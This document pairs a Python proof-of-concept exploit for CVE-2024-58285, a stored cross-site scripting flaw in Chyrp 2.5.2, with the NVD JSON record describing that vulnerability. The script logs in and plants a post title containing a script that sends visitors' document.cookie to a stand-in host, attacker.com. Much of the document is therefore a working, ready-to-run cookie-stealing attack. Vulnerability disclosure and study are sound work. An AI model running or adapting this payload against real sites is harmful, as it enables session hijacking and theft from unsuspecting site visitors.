CVE-2024-58285

import requests import sys # CVE-2024-58285 PoC - Chyrp 2.5.2 Stored XSS via Post Title # This PoC demonstrates how an authenticated user can inject malicious # JavaScript into post titles that will be executed when viewed by others TARGET_URL = "http://target-server.com/chyrp" USERNAME = "attacker" PASSWORD = "password123" def exploit(): # Step 1: Login to get session session = requests.Session() login_url = f"{TARGET_URL}/admin/?action=login" login_data = { "identifier": USERNAME, "password": PASSWORD } print("[*] Attempting to login...") response = session.post(login_url, data=login_data) if "Logged in" not in response.text and response.status_code != 200: print("[-] Login failed") return False print("[+] Login successful") # Step 2: Create post with XSS payload in title post_url = f"{TARGET_URL}/admin/?action=new_post" # XSS payload - steals cookies xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' post_data = { "title": xss_payload, "body": "This is a test post", "post": "Save" } print(f"[*] Creating post with XSS payload in title...") response = session.post(post_url, data=post_data) if response.status_code == 200: print("[+] Post created successfully") print(f"[!] XSS payload stored: {xss_payload}") print("[!] Payload will execute when any user views the post") return True else: print("[-] Failed to create post") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2024-58285", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:20.567", "lastModified": "2025-12-19T17:40:59.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Chyrp 2.5.2 contains a stored cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into post titles. Attackers can craft payloads in the title field that will execute when the post is viewed by other users, potentially stealing session cookies or performing client-side attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:chyrp:chyrp:2.5.2:*:*:*:*:*:*:*", "matchCriteriaId": "9BE8C320-F243-405C-812F-4F9850EDCACD"}]}]}], "references": [{"url": "https://github.com/chyrp/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.exploit-db.com/exploits/52013", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/chyrp-stored-cross-site-scripting-vulnerability-via-post-title", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/52013", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}